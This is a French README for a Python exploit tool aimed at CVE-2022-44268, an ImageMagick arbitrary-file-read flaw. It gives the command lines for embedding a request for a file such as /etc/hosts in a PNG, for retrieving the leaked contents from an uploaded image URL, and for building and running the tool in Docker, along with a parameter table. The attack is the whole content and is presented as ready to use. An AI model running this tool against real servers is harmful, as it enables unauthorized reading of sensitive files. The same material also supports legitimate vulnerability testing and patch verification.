
Exploit basé sur Python pour CVE-2022-44268, une vulnérabilité de lecture arbitraire de fichiers dans ImageMagick. Empoisonne des images PNG pour lire des fichiers sensibles depuis des hôtes vulnérables via un téléchargement web.
CVE-2022-44268 Lecture Arbitraire de Fichier ImageMagick
Empoisonner l'image ☣️
python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
Upload poisoned PNG image.
Vérifiez si l'exploit a réussi 🗡
python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png
Build
docker build -t cve-2022-44268 .
Run
docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png
| Paramètre | Description | Type |
|---|---|---|
| --url | L'URL de l'image PNG téléchargée | Chaîne |
| --image | Fichier PNG d'entrée | Fichier |
| --output | Fichier PNG de sortie | Fichier |
| --file-to-read | Fichier à lire depuis l'hôte vulnérable | Chaîne |